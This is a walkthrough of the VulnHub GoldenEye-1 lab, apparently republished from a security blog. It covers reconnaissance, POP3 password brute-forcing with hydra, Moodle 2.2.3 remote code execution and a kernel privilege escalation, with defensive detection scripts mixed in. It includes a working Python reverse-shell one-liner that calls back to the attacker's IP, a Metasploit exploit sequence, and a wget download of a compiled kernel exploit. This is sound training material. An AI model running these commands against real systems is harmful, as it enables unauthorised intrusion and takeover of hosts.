Lab walkthrough | VulnHub GoldenEye-1 with MSF
2023-12-27 23:13:25 Author: 渗透安全团队

title: Vulnhub-GlodenEye-1
categories:
- VulnHub
tags:
- Linux
- nmap
- gobuster
- JavaScript
- html
- POP3
- email
- hydra
- password brute-forcing
- exiftool
- strings
- Moodle
- RCE
- searchsploit
- metasploit
- name resolution
cover: /images/Vulnhub.png
abbrlink: 71172b32

0x01 Target overview

  • Name: GoldenEye: 1

  • Date release: 4 May 2018

  • Author: creosote

  • Series: GoldenEye

  • Description : The goal is to get root and capture the secret GoldenEye codes - flag.txt.

Download:

https://www.vulnhub.com/entry/goldeneye-1,240/

0x02 Reconnaissance

Port scanning

Start with an nmap port scan:

nmap -p- -sV -sC -A 192.168.0.103 -oA nmap_GlodenEye-1

The scan shows ports 25, 80, 55006 and 55007 open.

Port 80

Visiting http://192.168.0.103 shows a hint that /sev-home is a directory you can log in to.

Visiting http://192.168.0.103/sev-home/ brings up a login page.

Directory scanning

Directory brute-forcing with gobuster finds no useful directories or files:

gobuster dir -u http://192.168.0.103 -w /usr/share/wordlists/dirb/big.txt

0x03 Getting a shell [www-data]

Information gathering

The page source references a JavaScript file, terminal.js.

The source of http://192.168.0.103/terminal.js is:

```javascript
var data = [
  {
    GoldenEyeText: "<span><br/>Severnaya Auxiliary Control Station<br/>****TOP SECRET ACCESS****<br/>Accessing Server Identity<br/>Server Name:....................<br/>GOLDENEYE<br/><br/>User: UNKNOWN<br/><span>Naviagate to /sev-home/ to login</span>"
  }
];
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
//
var allElements = document.getElementsByClassName("typeing");
for (var j = 0; j < allElements.length; j++) {
  var currentElementId = allElements[j].id;
  var currentElementIdContent = data[0][currentElementId];
  var element = document.getElementById(currentElementId);
  var devTypeText = currentElementIdContent;

  var i = 0, isTag, text;
  (function type() {
    text = devTypeText.slice(0, ++i);
    if (text === devTypeText) return;
    element.innerHTML = text + `<span class='blinker'>&#32;</span>`;
    var char = text.slice(-1);
    if (char === "<") isTag = true;
    if (char === ">") isTag = false;
    if (isTag) return type();
    setTimeout(type, 60);
  })();
}
```

Decoding the HTML character references in the comment gives a password; the comment also names two users, Boris and Natalya.

&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;   # decodes to InvincibleHack3r
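A password hidden behind character references in a comment is exactly the kind of thing a review of deployed client-side code should catch. As an added example (my own code, not part of the original post), the Python below does the decoding step programmatically: it pulls `//` comments out of a JavaScript file, decodes any run of HTML character references it finds in them, and flags comments that talk about passwords. The sample source is a constructed, shortened copy of the comment block above; the function names are my own.

```python
import html
import re

# Constructed sample modelled on the terminal.js comment block quoted above
# (not the real file; shortened to the parts that matter).
SAMPLE_JS = """\
var data = [{ GoldenEyeText: "<span>Naviagate to /sev-home/ to login</span>" }];
//
//Boris, make sure you update your default password.
//I encoded you p@ssword below...
//
//&#73;&#110;&#118;&#105;&#110;&#99;&#105;&#98;&#108;&#101;&#72;&#97;&#99;&#107;&#51;&#114;
//
//BTW Natalya says she can break your codes
var allElements = document.getElementsByClassName("typeing");
"""

# A run of one or more character references: decimal (&#73;), hex (&#x49;) or named (&amp;).
ENTITY_RUN = re.compile(r'(?:&#(?:\d+|[xX][0-9a-fA-F]+);|&[A-Za-z][A-Za-z0-9]*;)+')
# A // line comment. Simplification: this also matches '//' inside string literals
# (e.g. "http://"), which for a review script only means a few extra candidates.
LINE_COMMENT = re.compile(r'//(.*)$')
# Words that make a comment worth a second look.
SENSITIVE_WORDS = ('password', 'p@ssword', 'passwd', 'secret', 'token')


def decode_entity_run(run: str) -> str:
    """Decode a run of HTML character references into plain text."""
    return html.unescape(run)


def find_encoded_comment_strings(js_source: str) -> list:
    """Return (line_number, decoded_text) for every entity run found inside a // comment."""
    hits = []
    for line_no, line in enumerate(js_source.splitlines(), start=1):
        m = LINE_COMMENT.search(line)
        if not m:
            continue
        for run in ENTITY_RUN.finditer(m.group(1)):
            hits.append((line_no, decode_entity_run(run.group(0))))
    return hits


def comment_mentions_secret(js_source: str) -> bool:
    """True if any // comment in the source contains a credential-related word."""
    for line in js_source.splitlines():
        m = LINE_COMMENT.search(line)
        if m and any(word in m.group(1).lower() for word in SENSITIVE_WORDS):
            return True
    return False


if __name__ == '__main__':
    for line_no, text in find_encoded_comment_strings(SAMPLE_JS):
        print(f'line {line_no}: encoded comment decodes to {text!r}')
    print('credential wording in comments:', comment_mentions_secret(SAMPLE_JS))
```

Run it against any bundle served to browsers; an entity run inside a comment has no reason to exist (comments are never rendered), so every hit deserves a look.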

Mail service

Logging in with boris/InvincibleHack3r succeeds, and the page hints that the next step involves the target's POP3 mail service.

Port 55007 on the target is the POP3 service.

Use hydra with the collected usernames and a password wordlist against POP3:

hydra 192.168.0.103 -s 55007 pop3 -L user.txt -P /usr/share/wordlists/fasttrack.txt -v

Two sets of credentials come back:

natalya/bird
boris/secret1!
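From the defender's side, the hydra run above is noisy: a burst of failed POP3 logins for several users from one source address, followed by a successful login. The Python below is an added example, not from the original post, that detects that pattern in mail-server logs. The log lines are constructed in Dovecot pop3-login style (an assumption; the page does not say which POP3 daemon the target runs), and the thresholds are illustrative.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed log lines in Dovecot "pop3-login" style. The format is an assumption:
# the page does not say which POP3 daemon the target runs.
SAMPLE_LOG = """\
Dec 27 23:10:01 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:10:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:10:02 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:10:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<natalya>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:10:03 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 2 secs): user=<boris>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:10:04 ubuntu dovecot: pop3-login: Login: user=<natalya>, method=PLAIN, rip=192.168.0.50, lip=192.168.0.103
Dec 27 23:12:40 ubuntu dovecot: pop3-login: Disconnected (auth failed, 1 attempts in 5 secs): user=<doak>, method=PLAIN, rip=192.168.0.77, lip=192.168.0.103
Dec 27 23:12:55 ubuntu dovecot: pop3-login: Login: user=<doak>, method=PLAIN, rip=192.168.0.77, lip=192.168.0.103
"""

LINE_RE = re.compile(
    r'^(?P<ts>[A-Z][a-z]{2} +\d{1,2} \d\d:\d\d:\d\d) \S+ dovecot: pop3-login: '
    r'(?P<event>Login|Disconnected \(auth failed[^)]*\)): user=<(?P<user>[^>]*)>.*?rip=(?P<rip>[\d.]+)'
)


def parse_pop3_log(text: str) -> list:
    """Parse lines into (timestamp, rip, user, success) tuples; unrecognised lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group('ts'), '%b %d %H:%M:%S')  # year-less syslog stamp
        events.append((ts, m.group('rip'), m.group('user'), m.group('event') == 'Login'))
    return events


def detect_pop3_bruteforce(text: str, max_failures: int = 5, window_seconds: int = 60) -> dict:
    """Flag source IPs with >= max_failures failed logins inside any window_seconds span.

    Returns {rip: {'failures': total, 'users': [...], 'login_after_failures': bool}}.
    """
    by_rip = defaultdict(list)
    for ev in parse_pop3_log(text):
        by_rip[ev[1]].append(ev)

    alerts = {}
    for rip, events in by_rip.items():
        events.sort(key=lambda e: e[0])
        window = deque()          # timestamps of recent failures (sliding window)
        failed_users = set()
        total_failures = 0
        flagged = False
        login_after = False
        for ts, _, user, success in events:
            if success:
                # a success after the threshold was crossed suggests a guessed password
                login_after = login_after or flagged
                continue
            total_failures += 1
            failed_users.add(user)
            window.append(ts)
            while (ts - window[0]).total_seconds() > window_seconds:
                window.popleft()
            if len(window) >= max_failures:
                flagged = True
        if flagged:
            alerts[rip] = {
                'failures': total_failures,
                'users': sorted(failed_users),
                'login_after_failures': login_after,
            }
    return alerts


if __name__ == '__main__':
    for rip, info in detect_pop3_bruteforce(SAMPLE_LOG).items():
        print(rip, info)
```

The interesting signal is the combination: many failures, more than one username from the same address, and then a success. Rate-limiting or fail2ban-style blocking on the POP3 port would stop the wordlist run long before hydra reached fasttrack.txt's entries.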

Log in as natalya and read the mailbox:

```
nc 192.168.0.103 55007
nc > user natalya
nc > pass bird
nc > list
nc > retr 1
nc > retr 2
nc > retr ...
nc > quit
```

Two of the emails read as follows:

```
## First email
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id D5EDA454B1
        for <natalya>; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.

## Second email
Return-Path: <root@ubuntu>
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id 17C96454B1
        for <natalya>; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

username: xenia
password: RCP90rulez!

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
**Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just point this servers IP to severnaya-station.com in /etc/hosts.
```

Log in as boris and read the mailbox:

```
nc 192.168.0.103 55007
nc > user boris
nc > pass secret1!
nc > list
nc > retr 1
nc > retr 2
nc > retr ...
nc > quit
```

The mailbox contents are:

```
## First email
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with SMTP id D9E47454B1
        for <boris>; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.

## Second email
Return-Path: <natalya@ubuntu>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id C3F2B454B1
        for <boris>; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!

## Third email
Return-Path: <[email protected]>
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
        by ubuntu (Postfix) with ESMTP id 4B9F4454B1
        for <boris>; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once Xenia gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
```

The emails give the credentials xenia/RCP90rulez!, and the second one says to map the server to severnaya-station.com locally, so add this line to /etc/hosts:

192.168.0.103 severnaya-station.com

Visiting http://severnaya-station.com/gnocertdir shows the following page.

Logging in with xenia/RCP90rulez! succeeds.

Under My profile > Messages there is a message from the user Dr Doak.

The message reads:

```
09:24 PM: Greetings Xenia,

As a new Contractor to our GoldenEye training I welcome you. Once your account has been complete, more courses will appear on your dashboard. If you have any questions message me via email, not here.

My email username is...

doak

Thank you,

Cheers,

Dr. Doak "The Doctor"
Training Scientist - Sr Level Training Operating Supervisor
GoldenEye Operations Center Sector
Level 14 - NO2 - id:998623-1334
Campus 4, Building 57, Floor -8, Sector 6, cube 1,007
Phone 555-193-826
Cell 555-836-0944
Office 555-846-9811
Personal 555-826-9923
Email: doak@

Please Recycle before you print, Stay Green aka save the company money!

"There's such a thing as Good Grief. Just ask Charlie Brown" - someguy
"You miss 100% of the shots you don't shoot at" - Wayne G.

THIS IS A SECURE MESSAGE DO NOT SEND IT UNLESS
```

Since an account named doak exists, run hydra again against it; the password comes back as goat:

hydra 192.168.0.103 -s 55007 pop3 -l doak -P /usr/share/wordlists/fasttrack.txt -v

Logging in to POP3 with doak/goat, the mailbox contains the credentials dr_doak/4England!:

```
nc 192.168.0.103 55007
nc > user doak
nc > pass goat
nc > list
nc > retr 1
nc > quit
```

dr_doak/4England! logs in to the website, where the file s3ret.txt reads:

```
007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
```

Image analysis

The note points to http://severnaya-station.com/dir007key/for-007.jpg.

Download the image and inspect it with strings or exiftool:

```
strings for-007.jpg
exiftool for-007.jpg
```

This turns up a Base64 string: eFdpbnRlcjE5OTV4IQ==

It decodes to xWinter1995x!

```
echo "eFdpbnRlcjE5OTV4IQ==" | base64 -d
## decoded: xWinter1995x!
```

admin/xWinter1995x! logs in as the site administrator.
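The Base64 string sits in the image's metadata, which is why strings and exiftool both surface it. As an added example (my own code, not the post's), the Python below performs the same audit without external tools, the kind of check worth running over images in a web root before they are published: it walks the JPEG marker segments that precede the compressed image data, collects COM and APPn payloads (where comments, EXIF and XMP live), and decodes any Base64 tokens that yield printable text. The JPEG is built in memory with a COM segment as a constructed sample; the real for-007.jpg may keep the string in a different segment.

```python
import base64
import re
import struct

# A base64-looking token: at least 12 alphabet characters plus optional padding.
B64_TOKEN = re.compile(rb'[A-Za-z0-9+/]{12,}={0,2}')


def build_sample_jpeg(comment: bytes) -> bytes:
    """Build a minimal JPEG (SOI, one COM segment, EOI). Constructed sample, not the page's image."""
    com = b'\xff\xfe' + struct.pack('>H', len(comment) + 2) + comment
    return b'\xff\xd8' + com + b'\xff\xd9'


def jpeg_metadata_segments(data: bytes) -> list:
    """Walk the marker segments before the image data and return (marker, payload)
    for COM (0xFE) and APPn (0xE0-0xEF) segments."""
    if data[:2] != b'\xff\xd8':
        raise ValueError('not a JPEG: missing SOI marker')
    segments = []
    pos = 2
    while pos + 4 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte between markers, skip it
            pos += 1
            continue
        if marker in (0xD9, 0xDA):    # EOI or SOS: no metadata segments follow
            break
        length = struct.unpack('>H', data[pos + 2:pos + 4])[0]   # length includes its own 2 bytes
        payload = data[pos + 4:pos + 2 + length]
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:
            segments.append((marker, payload))
        pos += 2 + length
    return segments


def decode_base64_tokens(payload: bytes) -> list:
    """Return (token, decoded_text) for tokens that are valid base64 and decode to printable ASCII."""
    found = []
    for m in B64_TOKEN.finditer(payload):
        token = m.group(0)
        if len(token) % 4:
            continue
        try:
            raw = base64.b64decode(token, validate=True)
        except ValueError:            # binascii.Error is a ValueError
            continue
        if raw.isascii() and raw.decode('ascii').isprintable():
            found.append((token.decode('ascii'), raw.decode('ascii')))
    return found


def scan_jpeg_for_encoded_text(data: bytes) -> list:
    """Decoded base64 strings found in the image's metadata segments."""
    hits = []
    for _, payload in jpeg_metadata_segments(data):
        hits.extend(decode_base64_tokens(payload))
    return hits


if __name__ == '__main__':
    sample = build_sample_jpeg(b'Operation note: eFdpbnRlcjE5OTV4IQ== ends here')
    for token, text in scan_jpeg_for_encoded_text(sample):
        print(f'{token} -> {text!r}')
```

Replace the constructed sample with `open('for-007.jpg', 'rb').read()` to run it against a real file. Stripping COM and APPn segments on upload (or re-encoding images) is the usual way to make sure nothing like this survives into a public web directory.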

Moodle RCE

Fingerprinting shows the site runs the Moodle CMS, version 2.2.3.

Vulnerability research

A Google search for this version turns up a remote code execution vulnerability.

exploit-db has exploit code for it: https://www.exploit-db.com/exploits/29324

searchsploit can also be used to look up known Moodle vulnerabilities.

Manual exploitation

Under Settings > Site administration > Plugins > Text editors > TinyMCE HTML editor, find Spell engine and change it from google spell to PSpellShell; the reason is that the target has no gcc, only cc.

Under Settings > Site administration > Server > System paths, put a reverse shell into Path to aspell:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.20.10.4",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Start a listener locally on port 8888:

nc -nvlp 8888

Under Home > My profile > Blogs > Add a new entry, create a blog post and click Toggle Spellchecker; the reverse shell connects back.

Upgrade to a pty with Python:

python -c 'import pty;pty.spawn("/bin/bash")'

Exploitation with MSF

The same can be done through MSF:

```
msfconsole
msf > use exploit/multi/http/moodle_cmd_exec
msf exploit(moodle_cmd_exec) > show options
msf exploit(moodle_cmd_exec) > set password xWinter1995x!
msf exploit(moodle_cmd_exec) > set rhosts severnaya-station.com
msf exploit(moodle_cmd_exec) > set targeturi /gnocertdir
msf exploit(moodle_cmd_exec) > run
```

On my machine no session came back, but on Kali 2018 the payload did return a shell.

0x04 Privilege escalation [root]

Information gathering

The kernel version is 3.13.0 (Ubuntu):

uname -a

Search with searchsploit for a matching privilege-escalation exploit:

searchsploit ubuntu 3.13.0

Kernel exploit

Use 37292.c:

cp /usr/share/exploitdb/exploits/linux/local/37292.c ./

Compile the exploit with gcc:

gcc 37292.c -o exp

Start an HTTP server locally:

python -m SimpleHTTPServer 80

Download the exploit onto the target and make it executable:

```
wget http://172.20.10.4/exp
chmod 777 exp
```

Running it fails with an error that gcc is missing:

./exp

So change gcc to cc in the source and recompile:

cc 37292.c -o ex

Running it again gives a root shell.

The flag file is found; it says the flag is under the web directory:

```
cd /root
ls -la
cat .flag.txt
```

Visiting http://172.20.10.2/006-final/xvf7-flag gives the flag.


Source: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247513377&idx=2&sn=7d9c9e03563ea66906adfa2f38a2acb6&chksm=c0a3c045e81c14a1c15b4150b03f0de5a711922f28839e294fa971d0951f0d3e33c1a3adddff&scene=0&xtrack=1#rd